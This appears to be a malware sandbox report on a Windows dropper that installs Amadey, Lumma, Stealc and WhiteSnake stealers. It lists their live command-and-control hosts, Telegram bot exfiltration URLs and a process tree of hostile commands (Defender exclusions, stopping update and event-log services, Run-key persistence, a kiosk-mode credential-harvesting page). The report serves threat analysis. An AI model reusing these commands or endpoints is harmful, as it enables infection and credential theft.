Analysis

  • max time kernel
    117s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-12-2024 04:10

General

  • Target

    52cabbe41d4d69e0d31d43cfcc90b9a86ca66d3e2d388dc30550a5ce6c75c925N.exe

  • Size

    7.0MB

  • MD5

    330cd482a3a8c49ae428f40127ea1880

  • SHA1

    25e98184fc148c9327f50a6d514ddf7c3717f9a7

  • SHA256

    52cabbe41d4d69e0d31d43cfcc90b9a86ca66d3e2d388dc30550a5ce6c75c925

  • SHA512

    cfe1396c2cc2b2c3969ecfd769461762848d669a0b06e04c45b9f5360c57798bd72c872198a21159b421e19c97f71a584e19ffbb1674ed480871c4fb7cbf88d7

  • SSDEEP

    196608:GQZ4FFsyfYKT2PsMUie0YhQYtZHblbc9Vq7HRTeMl+MuhT1:GQCT2UMUpQYtZ7lo9Vq7xTSzl

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://drive-connect.cyou

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

https://ratiomun.cyou

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

https://ratiomun.cyou/api

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendMessage?chat_id=7538374929

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/getUpdates?offset=-

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Milleniumrat family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 18 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 48 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 11 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 50 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\52cabbe41d4d69e0d31d43cfcc90b9a86ca66d3e2d388dc30550a5ce6c75c925N.exe
    "C:\Users\Admin\AppData\Local\Temp\52cabbe41d4d69e0d31d43cfcc90b9a86ca66d3e2d388dc30550a5ce6c75c925N.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:972
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A0z31.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A0z31.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2u37.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2u37.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T31K7.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T31K7.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:884
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2452
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\CryptedOnceMore.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2316
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 600
                7⤵
                • Program crash
                PID:2928
            • C:\Users\Admin\AppData\Local\Temp\1011459001\e7fe4c23d3.exe
              "C:\Users\Admin\AppData\Local\Temp\1011459001\e7fe4c23d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1804
              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3816
                • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4796
                • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                  "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3632
                  • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                    "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                    9⤵
                    • Executes dropped EXE
                    PID:1028
                  • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                    "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                    9⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2896
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 1424
                      10⤵
                      • Program crash
                      PID:3616
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 1416
                      10⤵
                      • Program crash
                      PID:3004
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 1400
                      10⤵
                      • Program crash
                      PID:3352
                • C:\Users\Admin\AppData\Local\Temp\1002824001\830a28b74b.exe
                  "C:\Users\Admin\AppData\Local\Temp\1002824001\830a28b74b.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:436
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 1576
                    9⤵
                    • Program crash
                    PID:4304
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 1596
                    9⤵
                    • Program crash
                    PID:3460
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 1576
                    9⤵
                    • Program crash
                    PID:1872
                • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
                  "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
                  8⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1756
                  • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                    "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:4800
                    • C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
                      "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
                      10⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      PID:1032
                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        11⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5272
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        11⤵
                          PID:5468
                          • C:\Windows\system32\wusa.exe
                            wusa /uninstall /kb:890830 /quiet /norestart
                            12⤵
                              PID:5708
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop UsoSvc
                            11⤵
                            • Launches sc.exe
                            PID:5484
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                            11⤵
                            • Launches sc.exe
                            PID:5776
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop wuauserv
                            11⤵
                            • Launches sc.exe
                            PID:5624
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop bits
                            11⤵
                            • Launches sc.exe
                            PID:5784
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop dosvc
                            11⤵
                            • Launches sc.exe
                            PID:5828
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            11⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5880
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                            11⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5888
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            11⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5896
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                            11⤵
                            • Power Settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5904
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe delete "QKJNEQWA"
                            11⤵
                            • Launches sc.exe
                            PID:5920
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
                            11⤵
                            • Launches sc.exe
                            PID:6104
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop eventlog
                            11⤵
                            • Launches sc.exe
                            PID:6148
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe start "QKJNEQWA"
                            11⤵
                            • Launches sc.exe
                            PID:6156
                        • C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe
                          "C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe"
                          10⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:540
                          • C:\Users\Admin\AppData\Local\Temp\is-G1L5D.tmp\stail.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-G1L5D.tmp\stail.tmp" /SL5="$150264,3290829,54272,C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe"
                            11⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of FindShellTrayWindow
                            PID:4588
                            • C:\Windows\SysWOW64\net.exe
                              "C:\Windows\system32\net.exe" pause powerful_player_1243
                              12⤵
                              • System Location Discovery: System Language Discovery
                              PID:4936
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 pause powerful_player_1243
                                13⤵
                                • System Location Discovery: System Language Discovery
                                PID:3268
                            • C:\Users\Admin\AppData\Local\Powerful Player 3.0.3.22\powerfulplayer32.exe
                              "C:\Users\Admin\AppData\Local\Powerful Player 3.0.3.22\powerfulplayer32.exe" -i
                              12⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:1912
                    • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
                      "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
                      8⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:4520
                    • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
                      "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
                      8⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      PID:1436
                      • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                        9⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:4652
                    • C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe
                      "C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe"
                      8⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      PID:3984
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 1444
                        9⤵
                        • Program crash
                        PID:3484
                    • C:\Users\Admin\AppData\Local\Temp\1005353001\App.exe
                      "C:\Users\Admin\AppData\Local\Temp\1005353001\App.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:4556
                      • C:\Users\Admin\AppData\Local\Temp\1005353001\App.exe
                        "C:\Users\Admin\AppData\Local\Temp\1005353001\App.exe"
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:1616
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "ver"
                          10⤵
                            PID:7128
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                            10⤵
                              PID:5616
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM chrome.exe
                                11⤵
                                • Kills process with taskkill
                                PID:5312
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
                              10⤵
                                PID:5600
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /F /IM msedge.exe
                                  11⤵
                                  • Kills process with taskkill
                                  PID:5300
                      • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
                        "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
                        6⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4464
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1640
                          7⤵
                          • Program crash
                          PID:2928
                      • C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe
                        "C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"
                        6⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1804
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF8C7.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF8C7.tmp.bat
                          7⤵
                            PID:1800
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              8⤵
                                PID:3756
                              • C:\Windows\system32\tasklist.exe
                                Tasklist /fi "PID eq 1804"
                                8⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1028
                              • C:\Windows\system32\find.exe
                                find ":"
                                8⤵
                                  PID:1912
                                • C:\Windows\system32\timeout.exe
                                  Timeout /T 1 /Nobreak
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:2492
                                • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                  "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                  8⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2148
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                    9⤵
                                      PID:4384
                                      • C:\Windows\system32\reg.exe
                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                        10⤵
                                        • Adds Run key to start application
                                        • Modifies registry key
                                        PID:1028
                              • C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3580
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 1664
                                  7⤵
                                  • Program crash
                                  PID:4752
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 1624
                                  7⤵
                                  • Program crash
                                  PID:4976
                              • C:\Users\Admin\AppData\Local\Temp\1012240001\d102b7192c.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012240001\d102b7192c.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:452
                              • C:\Users\Admin\AppData\Local\Temp\1012241001\8b11ad4969.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012241001\8b11ad4969.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:1000
                              • C:\Users\Admin\AppData\Local\Temp\1012243001\657825a4a4.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012243001\657825a4a4.exe"
                                6⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:3152
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM firefox.exe /T
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3876
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM chrome.exe /T
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1212
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM msedge.exe /T
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3920
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM opera.exe /T
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2320
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /F /IM brave.exe /T
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2008
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                  7⤵
                                    PID:4580
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                      8⤵
                                      • Checks processor information in registry
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4632
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c393e77-97db-4eac-bf36-130df1cb1c0a} 4632 "\\.\pipe\gecko-crash-server-pipe.4632" gpu
                                        9⤵
                                          PID:4356
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2440 -parentBuildID 20240401114208 -prefsHandle 2352 -prefMapHandle 2356 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a5d958f-e0cd-43f0-8d03-28655dad77fe} 4632 "\\.\pipe\gecko-crash-server-pipe.4632" socket
                                          9⤵
                                            PID:1984
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2756 -childID 1 -isForBrowser -prefsHandle 2960 -prefMapHandle 3536 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13a1cf8f-3359-4935-a6a3-9cfe4fcdc0de} 4632 "\\.\pipe\gecko-crash-server-pipe.4632" tab
                                            9⤵
                                              PID:392
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3984 -childID 2 -isForBrowser -prefsHandle 3980 -prefMapHandle 3976 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3c8789b-496b-4dfe-b67d-ea0c99b6d764} 4632 "\\.\pipe\gecko-crash-server-pipe.4632" tab
                                              9⤵
                                                PID:468
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
